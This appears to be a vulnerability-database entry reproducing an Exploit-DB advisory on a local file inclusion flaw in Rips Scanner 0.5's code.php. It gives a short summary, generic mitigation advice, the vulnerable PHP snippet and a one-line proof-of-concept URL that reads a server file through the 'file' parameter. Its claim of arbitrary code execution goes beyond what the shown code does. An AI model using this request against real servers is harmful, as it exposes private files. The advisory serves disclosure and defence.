Rips Scanner 0.5 - (code.php) Local File Inclusion

vendor:

Rips Scanner

by:

Ashiyane Digital Security Team

9,3

CVSS

HIGH

Local File Inclusion

CWE

Product Name: Rips Scanner

Affected Version From: 0.5

Affected Version To: 0.5

Patch Exists: NO

Related CWE: N/A

CPE: N/A

Metasploit: N/A

Other Scripts: N/A

Tags: N/A

CVSS Metrics: N/A

Nuclei References: N/A

Nuclei Metadata: N/A

Platforms Tested: N/A

2015

Rips Scanner 0.5 – (code.php) Local File Inclusion

Rips Scanner 0.5 is vulnerable to Local File Inclusion. The vulnerability exists due to insufficient sanitization of user-supplied input in the 'file' parameter of the 'code.php' script. An attacker can exploit this vulnerability to include arbitrary files from the web server and execute arbitrary code in the context of the web server process. The attacker can also include and execute arbitrary local files on the web server.

Mitigation:

Input validation should be used to prevent the exploitation of this vulnerability. All user-supplied input should be validated and filtered before being used in the application.

Source

Exploit-DB raw data:

================================================================================
# Rips Scanner 0.5 - (code.php) Local File Inclusion
================================================================================
# Vendor Homepage: https://github.com/robocoder/rips-scanner
# Date: 24/12/2015
# Software Link: https://github.com/robocoder/rips-scanner/archive/master.zip
# Version : 0.5
# Author: Ashiyane Digital Security Team
# Contact: hehsan979@gmail.com
# Source: http://ehsansec.ir/advisories/rips-code-lfi.txt
================================================================================
# Vulnerable File : code.php

# Vulnerable Code:

	
102	$file = $_GET['file'];
103	$marklines = explode(',', $_GET['lines']);
104	$ext = '.'.pathinfo($file, PATHINFO_EXTENSION);
105
106	
107	if(!empty($file) && is_file($file) && in_array($ext, $FILETYPES))
108	{
109		$lines = file($file);
110		
111		// place line numbers in extra table for more elegant copy/paste
without line numbers
112		echo '<tr><td><table>';
113		for($i=1, $max=count($lines); $i<=$max;$i++)
114			echo "<tr><td class=\"linenrcolumn\"><span
class=\"linenr\">$i</span><A id='".($i+2).'\'></A></td></tr>';
115		echo '</table></td><td id="codeonly"><table id="codetable" width="100%">';
116		
117		$in_comment = false;
118		for($i=0; $i<$max; $i++)
119		{				
120			$in_comment = highlightline($lines[$i], $i+1, $marklines, $in_comment);
121		}
122	} else
123	{
124		echo '<tr><td>Invalid file specified.</td></tr>';
125	}


# PoC :

http://localhost/rips/windows/code.php?file=/var/www/html/index.php

Vulnerable Parameter : file

================================================================================
# Discovered By : Ehsan Hosseini (EhsanSec.ir)
================================================================================